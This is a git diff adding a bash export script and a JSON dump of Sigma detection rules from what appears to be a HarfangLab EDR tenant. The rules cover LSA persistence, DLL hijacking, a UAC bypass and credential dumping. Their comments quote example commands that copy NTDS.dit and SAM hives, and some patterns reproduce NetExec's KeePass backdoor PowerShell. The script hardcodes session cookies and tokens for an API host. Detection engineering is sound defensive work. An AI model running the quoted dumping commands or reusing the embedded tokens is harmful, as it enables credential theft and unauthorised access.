+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832835Z",
+ "creation_date": "2026-03-23T11:45:30.832838Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832847Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2dd7461a636a4b507e5aff3cbe8c54545a9c497ca45299e4ba69e34866b37d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
diff --git a/harfang_export/export.sh b/harfang_export/export.sh
new file mode 100644
index 0000000..74b9379
--- /dev/null
+++ b/harfang_export/export.sh
@@ -0,0 +1,40 @@
+#!/bin/bash
+
+BASE_URL="https://2ee66321e45741fa.hurukai.io:8443"
+COOKIE="hlab_token=a0fdeaebc1de7a5a7e27ee39bffe684f99270280; hlab_front=\"\"; sessionid=gp9c7k3j67gjdwy3q41ai1z0jsbxjc1v"
+limit=50
+offset=0
+total=0
+
+while true; do
+ echo "Fetching offset=$offset..."
+
+ response=$(curl -s -X GET \
+ "$BASE_URL/api/data/threat_intelligence/CorrelationRule/?limit=$limit&offset=$offset" \
+ -H "accept: application/json" \
+ -H "Cookie: $COOKIE")
+
+ # Vérifie si la réponse est valide
+ count=$(echo "$response" | jq -r '.count')
+ if [ "$count" == "null" ] || [ -z "$count" ]; then
+ echo "Erreur ou réponse invalide :"
+ echo "$response" | head -c 500
+ break
+ fi
+
+ echo "Total disponible : $count"
+
+ # Sauvegarde les résultats
+ echo "$response" | jq '.results[]' >> resultats.json
+
+ total=$((total + $(echo "$response" | jq '.results | length')))
+ echo "Récupérés jusqu'ici : $total"
+
+ next=$(echo "$response" | jq -r '.next')
+ if [ "$next" == "null" ]; then
+ echo "Terminé ! $total résultats récupérés."
+ break
+ fi
+
+ offset=$((offset + limit))
+done
diff --git a/harfang_export/sigma_export.json b/harfang_export/sigma_export.json
new file mode 100644
index 0000000..4bb745e
--- /dev/null
+++ b/harfang_export/sigma_export.json
@@ -0,0 +1,131774 @@
+{
+ "id": "003481a2-e45e-44fd-9433-b13492669c31",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.076504Z",
+ "creation_date": "2026-03-23T11:45:34.076506Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.076511Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/t1174-password-filter-dll",
+ "https://attack.mitre.org/techniques/T1547/002/"
+ ],
+ "name": "t1547_002_persistence_lsa_authentication_package.yml",
+ "content": "title: LSA Authentication Package Installed\nid: 003481a2-e45e-44fd-9433-b13492669c31\ndescription: |\n Detects the installation of a new authentication package via a registry modification.\n The LSA (Local Security Authority) is a critical Windows component responsible for managing security policies and authentication.\n Attackers may install these packages to gain elevated privileges or establish persistence.\n It is recommended to investigate the source of the configuration change, review the permissions and ownership of the affected LSA settings, and verify the legitimacy of the modification.\n If the change cannot be attributed to a legitimate process, consider rolling back the configuration.\nreferences:\n - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/t1174-password-filter-dll\n - https://attack.mitre.org/techniques/T1547/002/\ndate: 2020/09/22\nmodified: 2025/05/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Authentication Packages'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_malwarebytes:\n Image: '?:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe'\n\n exclusion_scecli:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n Details: 'scecli'\n\n exclusion_msv10:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n Details: 'msv1_0' # default value\n\n exclusion_known_fp:\n Details:\n - 'msv1_0'\n - 'msv1_0;sshdpinauthlsa' # C:\\WINDOWS\\system32\\SshdPinAuthLsa.dll, DLL from microsoft\n - 'msv1_0;ZenV1_0' # Novell ZENworks\n - 'msv1_0;nxlsa' # NoMachine S.a.r.l.\n - 'msv1_0;BvLsaEx' # BvSshServer-Inst.exe\n - 'msv1_0;teleport' # teleport-windows-auth-setup - Teleport RMM - https://goteleport.com/download/?product=connect&os=windows\n - 'msv1_0;CSALsubauth' # https://www.authlite.com/\n - 'msv1_0;wvauth' # Wave Systems Corp.\n - 'msv1_0;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;SshdPinAuthLsa;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;SshdPinAuthLsa;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "003481a2-e45e-44fd-9433-b13492669c31",
+ "rule_name": "LSA Authentication Package Installed",
+ "rule_description": "Detects the installation of a new authentication package via a registry modification.\nThe LSA (Local Security Authority) is a critical Windows component responsible for managing security policies and authentication.\nAttackers may install these packages to gain elevated privileges or establish persistence.\nIt is recommended to investigate the source of the configuration change, review the permissions and ownership of the affected LSA settings, and verify the legitimacy of the modification.\nIf the change cannot be attributed to a legitimate process, consider rolling back the configuration.\n",
+ "rule_creation_date": "2020-09-22",
+ "rule_modified_date": "2025-05-05",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.persistence"
+ ],
+ "rule_technique_tags": [
+ "attack.t1112",
+ "attack.t1547.002"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "006ebafe-6e79-4642-a76f-5073a4cc1bc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.098649Z",
+ "creation_date": "2026-03-23T11:45:34.098651Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.098656Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://github.com/xforcered/WFH",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_dnscacheugc.yml",
+ "content": "title: DLL Hijacking via dnscacheugc.exe\nid: 006ebafe-6e79-4642-a76f-5073a4cc1bc5\ndescription: |\n Detects potential Windows DLL Hijacking via dnscacheugc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dnscacheugc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\IPHLPAPI.DLL'\n - '\\wdscore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "006ebafe-6e79-4642-a76f-5073a4cc1bc5",
+ "rule_name": "DLL Hijacking via dnscacheugc.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via dnscacheugc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0070bcf5-0b6e-40f9-9b07-baad4a18cf84",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.627344Z",
+ "creation_date": "2026-03-23T11:45:34.627346Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.627350Z",
+ "rule_level": "medium",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/jschicht/RawCopy",
+ "http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html",
+ "https://attack.mitre.org/techniques/T1006/"
+ ],
+ "name": "t1006_raw_access_files.yml",
+ "content": "title: Files Accessed via Raw Device Access\nid: 0070bcf5-0b6e-40f9-9b07-baad4a18cf84\ndescription: |\n Detects raw access to files through tools like RawCopy or FGET.\n Attackers can raw access files to dump them and evade detection mechanisms, as well as bypass locked files.\n It is recommended to investigate the command-line arguments to check which file was accessed and to analyze the parent process for suspicious activities.\nreferences:\n - https://github.com/jschicht/RawCopy\n - http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html\n - https://attack.mitre.org/techniques/T1006/\ndate: 2022/10/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.RawCopy\n - classification.Windows.Tool.FGET\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # RawCopy.exe /FileNamePath:C:\\Windows\\NTDS\\ntds.dit /OutputPath:C:\\Windows\\Temp\\ntds.dit\n selection_rawcopy:\n LegalCopyright: 'Joakim Schicht'\n Description: 'Copy files from NTFS volumes by using low level disk access'\n CommandLine|contains: 'FileNamePath'\n\n # FGET.exe -extract C:\\Windows\\System32\\config\\SAM C:\\Windows\\Temp\\out.sam\n selection_fget:\n # Signed by HBGary, Inc\n # The certificate was explicitly revoked by its issuer\n Imphash: '72B17395940FD0266D2CBBF8EB32CF3C'\n CommandLine|contains: 'extract'\n\n # This is handled by the rule aaf113bc-6b63-46d3-919a-9b2a105bcd5f\n filter_sensitive_files:\n CommandLine|contains:\n - '\\Windows\\NTDS\\NTDS.dit'\n - '\\Windows\\System32\\config\\SAM'\n - '\\Windows\\System32\\config\\SECURITY'\n - '\\Windows\\System32\\config\\SYSTEM'\n\n exclusion_bmc:\n Ancestors|endswith: '?:\\Program Files\\BMC Software\\BladeLogic\\RSC\\RSCDsvc.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0070bcf5-0b6e-40f9-9b07-baad4a18cf84",
+ "rule_name": "Files Accessed via Raw Device Access",
+ "rule_description": "Detects raw access to files through tools like RawCopy or FGET.\nAttackers can raw access files to dump them and evade detection mechanisms, as well as bypass locked files.\nIt is recommended to investigate the command-line arguments to check which file was accessed and to analyze the parent process for suspicious activities.\n",
+ "rule_creation_date": "2022-10-19",
+ "rule_modified_date": "2026-02-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1006"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "008189c4-a1fb-4a50-86ed-a178011f9cc2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.077824Z",
+ "creation_date": "2026-03-23T11:45:34.077826Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.077830Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/",
+ "https://attack.mitre.org/techniques/T1548/002/"
+ ],
+ "name": "t1548_002_post_uac_bypass_sdclt.yml",
+ "content": "title: UAC Bypass Executed via sdclt\nid: 008189c4-a1fb-4a50-86ed-a178011f9cc2\ndescription: |\n Detects an unusual process being spawned by sdclt.exe.\n This is action is probably the result of a UAC bypass attempt, prepared by setting specific values in thre registry.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\n It is recommended to investigate the detected process and its execution context to determine its legitimacy.\nreferences:\n - https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/10/12\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\sdclt.exe'\n\n filter_common:\n Image:\n - '?:\\Windows\\System32\\sdclt.exe'\n - '?:\\Windows\\System32\\control.exe'\n - '?:\\Windows\\System32\\recdisc.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "008189c4-a1fb-4a50-86ed-a178011f9cc2",
+ "rule_name": "UAC Bypass Executed via sdclt",
+ "rule_description": "Detects an unusual process being spawned by sdclt.exe.\nThis is action is probably the result of a UAC bypass attempt, prepared by setting specific values in thre registry.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\nIt is recommended to investigate the detected process and its execution context to determine its legitimacy.\n",
+ "rule_creation_date": "2020-10-12",
+ "rule_modified_date": "2025-02-05",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1548.002"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "00a9c87a-2497-4d37-878f-7cb8f3560972",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.091095Z",
+ "creation_date": "2026-03-23T11:45:34.091097Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.091102Z",
+ "rule_level": "critical",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/keepass_trigger_module/AddKeePassTrigger.ps1",
+ "https://attack.mitre.org/techniques/T1555/005/",
+ "https://attack.mitre.org/techniques/T1059/001/"
+ ],
+ "name": "t1555_005_netexec_keepass.yml",
+ "content": "title: KeePass Backdoored via NetExec\nid: 00a9c87a-2497-4d37-878f-7cb8f3560972\ndescription: |\n Detects a dump of a KeePass database made using the NetExec tools.\n NetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/keepass_trigger_module/AddKeePassTrigger.ps1\n - https://attack.mitre.org/techniques/T1555/005/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/07/23\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.HackTool.NetExec\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_add:\n PowershellCommand|contains|all:\n - '$Null = $KeePassXML.Configuration.Application.TriggerSystem.Triggers.AppendChild($KeePassXML.ImportNode($TriggerXML.Trigger, $True))'\n - \"$Null = $KeePassXML.Configuration.Application.TriggerSystem.ReplaceChild($Triggers, $KeePassXML.Configuration.Application.TriggerSystem.SelectSingleNode('Triggers'))\"\n - 'bES7XfGLTA2IzmXm6a0pig=='\n - 'D5prW87VRr65NO2xP5RIIg=='\n selection_remove:\n PowershellCommand|contains|all:\n - '$KeePassXML.Configuration.Application.TriggerSystem.Triggers.RemoveChild($Child)'\n - '$Children = $KeePassXML.Configuration.Application.TriggerSystem.Triggers | ForEach-Object {$_.Trigger} | Where-Object {$_.Name -like $TriggerName}'\n - \"if($KeePassXMLPath -and ($KeePassXMLPath -match '.\\\\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {\"\n selection_restart:\n PowershellCommand|contains|all:\n - \"if($KeePassXMLPath -and ($KeePassXMLPath -match '.\\\\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {\"\n - 'taskkill /F /T /IM keepass.exe /FI \"USERNAME eq $KeePassUser\"'\n condition: 1 of selection_*\nlevel: critical\nconfidence: strong",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "00a9c87a-2497-4d37-878f-7cb8f3560972",
+ "rule_name": "KeePass Backdoored via NetExec",
+ "rule_description": "Detects a dump of a KeePass database made using the NetExec tools.\nNetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n",
+ "rule_creation_date": "2024-07-23",
+ "rule_modified_date": "2025-01-15",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.credential_access",
+ "attack.execution"
+ ],
+ "rule_technique_tags": [
+ "attack.t1059.001",
+ "attack.t1555.005"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "00d0b7b5-b0af-4d67-8658-5a08f0acf307",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.618852Z",
+ "creation_date": "2026-03-23T11:45:34.618854Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.618858Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/xforcered/WFH",
+ "https://securityintelligence.com/posts/windows-features-dll-sideloading/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_infdefaultinstall.yml",
+ "content": "title: DLL Hijacking via InfDefaultInstall.exe\nid: 00d0b7b5-b0af-4d67-8658-5a08f0acf307\ndescription: |\n Detects potential Windows DLL Hijacking via InfDefaultInstall.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'InfDefaultInstall.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\drvstore.dll'\n - '\\newdev.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "00d0b7b5-b0af-4d67-8658-5a08f0acf307",
+ "rule_name": "DLL Hijacking via InfDefaultInstall.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via InfDefaultInstall.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2022-09-15",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "00ecf213-801a-4ee0-b19d-fbe12001d4a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "low",
+ "rule_effective_confidence": "weak",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-24T07:14:08.719555Z",
+ "creation_date": "2026-03-23T11:45:34.612526Z",
+ "enabled": true,
